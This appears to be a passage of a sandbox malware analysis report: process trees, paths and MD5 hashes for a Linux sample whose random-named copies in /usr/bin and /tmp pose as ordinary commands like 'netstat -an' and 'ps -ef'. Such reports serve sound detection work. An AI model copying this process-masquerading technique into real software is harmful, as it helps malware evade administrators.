Arguments:	/usr/bin/thqvayvyih "route -n" 9446
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: thqvayvyih PID: 11390, Parent PID: 11384

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11385, Parent PID: 9446

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11386, Parent PID: 11385

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thqvayvyih PID: 11386, Parent PID: 3310

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	/usr/bin/thqvayvyih "grep \"A\"" 9446
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: thqvayvyih PID: 11391, Parent PID: 11386

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11432, Parent PID: 9446

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11433, Parent PID: 11432

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11433, Parent PID: 3310

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	/usr/bin/fcpzadqmpt "cat resolv.conf" 9446
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11443, Parent PID: 11433

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: dkuidbsedp PID: 11434, Parent PID: 9446

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11435, Parent PID: 11434

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11435, Parent PID: 3310

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	/usr/bin/fcpzadqmpt "netstat -an" 9446
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11445, Parent PID: 11435

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: dkuidbsedp PID: 11436, Parent PID: 9446

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11437, Parent PID: 11436

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11437, Parent PID: 3310

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	/usr/bin/fcpzadqmpt "cd /etc" 9446
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11448, Parent PID: 11437

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: dkuidbsedp PID: 11438, Parent PID: 9446

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11439, Parent PID: 11438

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11439, Parent PID: 3310

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	/usr/bin/fcpzadqmpt gnome-terminal 9446
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11442, Parent PID: 11439

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: dkuidbsedp PID: 11440, Parent PID: 9446

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11441, Parent PID: 11440

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11441, Parent PID: 3310

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	/usr/bin/fcpzadqmpt whoami 9446
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: fcpzadqmpt PID: 11452, Parent PID: 11441

General

Start time:	09:51:20
Start date:	27/07/2022
Path:	/usr/bin/fcpzadqmpt
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	cc75cad92a9029b37a17aacb9017eeca

Chronological Activities

Analysis Process: dkuidbsedp PID: 11487, Parent PID: 9446

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11488, Parent PID: 11487

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11488, Parent PID: 3310

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	/usr/bin/ibtfyvoofm "netstat -an" 9446
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11499, Parent PID: 11488

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: dkuidbsedp PID: 11489, Parent PID: 9446

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11490, Parent PID: 11489

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11490, Parent PID: 3310

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	/usr/bin/ibtfyvoofm bash 9446
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11500, Parent PID: 11490

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: dkuidbsedp PID: 11491, Parent PID: 9446

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11492, Parent PID: 11491

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11492, Parent PID: 3310

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	/usr/bin/ibtfyvoofm "echo \"find\"" 9446
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11496, Parent PID: 11492

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: dkuidbsedp PID: 11493, Parent PID: 9446

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11494, Parent PID: 11493

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11494, Parent PID: 3310

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	/usr/bin/ibtfyvoofm "route -n" 9446
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11498, Parent PID: 11494

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: dkuidbsedp PID: 11495, Parent PID: 9446

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11497, Parent PID: 11495

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11497, Parent PID: 3310

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	/usr/bin/ibtfyvoofm "ps -ef" 9446
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: ibtfyvoofm PID: 11504, Parent PID: 11497

General

Start time:	09:51:25
Start date:	27/07/2022
Path:	/usr/bin/ibtfyvoofm
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	03edbd21c1aa2730f07a68b2348159b3

Chronological Activities

Analysis Process: dkuidbsedp PID: 11542, Parent PID: 9446

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11543, Parent PID: 11542

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tlayyibcia PID: 11543, Parent PID: 3310

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	/usr/bin/tlayyibcia "netstat -antop" 9446
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: tlayyibcia PID: 11554, Parent PID: 11543

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	n/a
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11544, Parent PID: 9446

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11545, Parent PID: 11544

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tlayyibcia PID: 11545, Parent PID: 3310

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	/usr/bin/tlayyibcia who 9446
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: tlayyibcia PID: 11549, Parent PID: 11545

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	n/a
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11546, Parent PID: 9446

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11547, Parent PID: 11546

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tlayyibcia PID: 11547, Parent PID: 3310

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	/usr/bin/tlayyibcia "sleep 1" 9446
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: tlayyibcia PID: 11552, Parent PID: 11547

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	n/a
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11548, Parent PID: 9446

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11550, Parent PID: 11548

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tlayyibcia PID: 11550, Parent PID: 3310

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	/usr/bin/tlayyibcia "cat resolv.conf" 9446
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: tlayyibcia PID: 11557, Parent PID: 11550

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	n/a
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11551, Parent PID: 9446

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11553, Parent PID: 11551

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tlayyibcia PID: 11553, Parent PID: 3310

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	/usr/bin/tlayyibcia pwd 9446
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: tlayyibcia PID: 11555, Parent PID: 11553

General

Start time:	09:51:30
Start date:	27/07/2022
Path:	/usr/bin/tlayyibcia
Arguments:	n/a
File size:	625911 bytes
MD5 hash:	7cf86117f153415b6daedda78b73d36d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11597, Parent PID: 9446

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11598, Parent PID: 11597

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11598, Parent PID: 3310

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	/usr/bin/dzlsbdiinr "echo \"find\"" 9446
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11610, Parent PID: 11598

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11599, Parent PID: 9446

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11600, Parent PID: 11599

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11600, Parent PID: 3310

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	/usr/bin/dzlsbdiinr "sleep 1" 9446
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11609, Parent PID: 11600

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11601, Parent PID: 9446

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11602, Parent PID: 11601

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11602, Parent PID: 3310

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	/usr/bin/dzlsbdiinr "cat resolv.conf" 9446
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11606, Parent PID: 11602

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11603, Parent PID: 9446

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11604, Parent PID: 11603

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11604, Parent PID: 3310

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	/usr/bin/dzlsbdiinr top 9446
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11608, Parent PID: 11604

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11605, Parent PID: 9446

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11607, Parent PID: 11605

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11607, Parent PID: 3310

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	/usr/bin/dzlsbdiinr pwd 9446
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dzlsbdiinr PID: 11612, Parent PID: 11607

General

Start time:	09:51:35
Start date:	27/07/2022
Path:	/usr/bin/dzlsbdiinr
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	65badaeedebb92c5ee46db973849ecc9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11652, Parent PID: 9446

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11653, Parent PID: 11652

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11653, Parent PID: 3310

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	/usr/bin/qwdfhkhfeq bash 9446
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11665, Parent PID: 11653

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: dkuidbsedp PID: 11654, Parent PID: 9446

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11655, Parent PID: 11654

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11655, Parent PID: 3310

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	/usr/bin/qwdfhkhfeq sh 9446
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11669, Parent PID: 11655

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: dkuidbsedp PID: 11656, Parent PID: 9446

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11657, Parent PID: 11656

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11657, Parent PID: 3310

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	/usr/bin/qwdfhkhfeq "ps -ef" 9446
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11678, Parent PID: 11657

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: dkuidbsedp PID: 11658, Parent PID: 9446

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11660, Parent PID: 11658

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11660, Parent PID: 3310

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	/usr/bin/qwdfhkhfeq gnome-terminal 9446
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11680, Parent PID: 11660

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: dkuidbsedp PID: 11661, Parent PID: 9446

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11664, Parent PID: 11661

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11664, Parent PID: 3310

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	/usr/bin/qwdfhkhfeq "route -n" 9446
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: qwdfhkhfeq PID: 11679, Parent PID: 11664

General

Start time:	09:51:40
Start date:	27/07/2022
Path:	/usr/bin/qwdfhkhfeq
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8319fc5b221a7d18e282495ae6404206

Chronological Activities

Analysis Process: dkuidbsedp PID: 11707, Parent PID: 9446

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11708, Parent PID: 11707

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: ldaqsdrmbu PID: 11708, Parent PID: 3310

General

Start time:	09:51:45
Start date:	27/07/2022
Path:	/usr/bin/ldaqsdrmbu
